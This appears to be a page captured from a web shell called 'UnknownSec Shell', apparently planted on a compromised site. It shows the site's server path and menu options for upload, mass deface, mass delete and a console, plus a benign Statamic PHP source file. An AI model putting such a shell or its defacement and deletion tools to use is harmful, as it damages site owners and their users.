shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Tags
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
Scope.php
<?php namespace Statamic\Tags; use Statamic\View\Cascade; class Scope extends Tags { public function wildcard($method) { throw_unless($this->isPair, new \Exception('Scope tag must be a pair')); app(Cascade::class)->set($this->method, $this->context->all()); return $this->context->all(); } }
© 2026 UnknownSec